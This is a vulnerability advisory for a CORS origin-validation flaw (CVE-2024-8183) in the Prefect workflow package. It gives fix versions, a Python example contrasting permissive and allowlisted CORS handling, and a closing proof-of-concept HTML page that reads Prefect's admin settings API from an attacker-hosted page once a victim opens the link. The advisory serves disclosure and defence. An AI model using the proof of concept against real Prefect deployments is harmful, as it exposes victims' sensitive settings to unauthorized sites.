Origin Validation Error Affecting prefect package, versions [,2.20.17)[3.0.0,3.0.3)


Severity

high (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity
Proof of Concept

  • Snyk ID: SNYK-PYTHON-PREFECT-9487016
  • published: 21 Mar 2025
  • disclosed: 20 Mar 2025
  • credits: rivallikusumba

Introduced: 20 Mar 2025

CVE-2024-8183
CWE-346

How to fix?

Upgrade prefect to version 2.20.17, 3.0.3 or higher.

Overview

Prefect is a workflow management system designed for modern infrastructure and powered by the open-source Prefect Core workflow engine. Users organize Tasks into Flows, and Prefect takes care of the rest.

Affected versions of this package are vulnerable to Origin Validation Error due to a misconfigured CORS policy that does not properly restrict which origins may make cross-origin requests to the API. An attacker can access sensitive data and potentially disrupt services by sending requests from unauthorized domains.
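The defect class here is an API that hands out Access-Control-Allow-Origin without checking the Origin against an allowlist, so a browser on an arbitrary page is permitted to read the response. The following is an added illustration written for this page, not Prefect's own code: it places a permissive handler (reflecting any Origin) beside a strict one that canonicalizes the Origin and compares it to an allowlist, and it simulates the browser-side check that decides whether a cross-origin script may read the body. The allowlist entries and origins are constructed sample values.

```python
from typing import Dict, Optional, Set
from urllib.parse import urlsplit


def normalize_origin(origin: str) -> Optional[str]:
    """Canonicalize an Origin header to scheme://host[:port].

    Returns None for anything that is not a well-formed http(s) origin,
    including the literal "null" origin. Lower-cases the host and drops a
    port that equals the scheme's default, which is how browsers serialize
    origins before comparing them with Access-Control-Allow-Origin.
    """
    try:
        parts = urlsplit(origin.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return None
    host = parts.hostname.lower()
    default_port = 443 if parts.scheme == "https" else 80
    if port is None or port == default_port:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


# Constructed allowlist for the example; a real service would load it from
# configuration. Entries are stored in canonical form so comparison is exact.
ALLOWED_ORIGINS: Set[str] = {
    normalize_origin("https://app.example.com"),
    normalize_origin("http://localhost:4200"),
}


def cors_headers_permissive(origin: str) -> Dict[str, str]:
    """The weak pattern: echo whatever Origin arrives.

    Combined with credentials this is equivalent to allowing every site on
    the internet to read authenticated API responses.
    """
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_strict(origin: str, allowed: Set[str] = ALLOWED_ORIGINS) -> Dict[str, str]:
    """The corrected pattern: exact allowlist match on the canonical origin.

    An unknown origin gets no Access-Control-Allow-Origin header at all, so
    the browser refuses to expose the response to the calling script.
    "Vary: Origin" is always sent so caches never serve one origin's
    CORS headers to another.
    """
    canonical = normalize_origin(origin)
    if canonical is None or canonical not in allowed:
        return {"Vary": "Origin"}
    return {
        "Access-Control-Allow-Origin": canonical,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def browser_can_read(page_origin: str, response_headers: Dict[str, str]) -> bool:
    """Simulate the browser's CORS decision for a credentialed request.

    The body is exposed to the script only when Access-Control-Allow-Origin
    exactly equals the requesting page's serialized origin. A wildcard is
    rejected because credentialed responses may not use "*".
    """
    acao = response_headers.get("Access-Control-Allow-Origin")
    if acao is None or acao == "*":
        return False
    return acao == normalize_origin(page_origin)


if __name__ == "__main__":
    attacker = "http://malicious-site.com"  # constructed, same value as the PoC
    print("permissive exposes to attacker:",
          browser_can_read(attacker, cors_headers_permissive(attacker)))
    print("strict exposes to attacker:",
          browser_can_read(attacker, cors_headers_strict(attacker)))
    print("strict exposes to allowlisted app:",
          browser_can_read("https://app.example.com", cors_headers_strict("https://app.example.com")))
```

Two points are worth checking in any CORS review: the comparison must be an exact match on the whole canonical origin (substring or prefix checks let attacker-controlled hostnames such as a look-alike domain through), and a credentialed response must never carry a reflected or wildcard Access-Control-Allow-Origin.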

PoC

  1. Create cors.html on the attacker's server:
<!DOCTYPE html>
<html>
<head>
    <title>CORS PoC</title>
</head>
<body>
    <h1>CORS PoC</h1>
    <script>
        fetch('http://127.0.0.1:4200/api/admin/settings', {
            method: 'GET',
            headers: {
                'Origin': 'http://malicious-site.com'
            }
        })
        .then(response => response.text())  // Convert the response to text
        .then(data => {
            alert('CORS PoC Response:\n' + data);  // Alert the entire response
        })
        .catch(error => {
            alert('CORS PoC Error:\n' + error);  // Alert any error that occurs
        });
    </script>
</body>
</html>
  2. Host it and send the link; as soon as the victim clicks on it, the data pops up in an alert (demo).
